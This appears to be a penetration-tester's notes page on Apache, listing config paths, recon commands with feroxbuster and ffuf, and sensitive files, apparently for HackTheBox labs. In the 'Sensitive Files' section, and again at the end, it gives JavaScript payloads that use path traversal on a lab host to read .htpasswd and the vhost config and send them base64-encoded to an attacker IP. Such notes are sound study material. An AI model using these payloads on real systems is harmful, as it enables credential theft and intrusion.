Apache

It uses a process-based model, where each request is handled by a separate thread or process, which can be resource-heavy under high traffic but provides great compatibility.

Configuration Files

Standard

/etc/apache2/apache2.conf

RHEL

/etc/httpd/httpd.conf

FreeBSD

/etc/apache24/httpd.conf

vhost

/etc/apache2/sites-enabled/000-default.conf

Modules

/etc/apache2/mods-available/

Initial Recon

If you are lucky you may be able to find /sites-enabled and /sites-available or even logs:

feroxbuster -u http://URL.htb -w ~/Documents/Wordlists/default-web-root-directory-linux.txt --output urls.txt --redirects

robots.txt can reveal pages that the server is hiding.
Fuzz for vhosts at sight of 301 responses.

Ffuf

ffuf -c -w ~/Documents/Wordlists/subdomains-top1million-20000.txt -u http://SITE/ -H "Host: FUZZ.URL.htb" -fc 301 -ac

/cgi-bin/: Directory for executing CGI scripts.

/icons/: Often used for directory listings. It may expose unintended file paths.
phpinfo.php: Disclose sensitive server and PHP configuration details.

Authentication/Authorization

`Authentication`

.htaccess: Configures directory-specific rules for authentication and other settings.
.htpasswd: Stores user credentials for basic authentication.

Standard Modules

`mod_status`

/server-status: Real-time status and diagnostic information about the server, including active requests, resource usage, and server performance.

/server-info: Server health and performance monitoring.

PHP Modules

To Allow PHP execution you need to add this line to /etc/apache2/apache2.conf:

LoadModule php_module /usr/lib/apache2/modules/libphp.so
    AddType application/x-httpd-php .php

You can actually add any extension that you want:

AddType application/x-httpd-php .l33t

Sensitive Files

Authorization File

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();

Default config file

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();

Logs

Access Logs:
- /var/log/apache2/access.log
- /var/log/httpd/access_log
Error logs:
- /var/log/apache2/error.log
- /var/log/httpd/error_log

PreviousWeb Servers NextNginx

Last updated 2 months ago

var req = new XMLHttpRequest(); req.open('GET', 'http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd', false); req.send(); var req2 = new XMLHttpRequest(); req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText), true); req2.send();

var req = new XMLHttpRequest(); req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false); req.send(); var req2 = new XMLHttpRequest(); req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText), true); req2.send();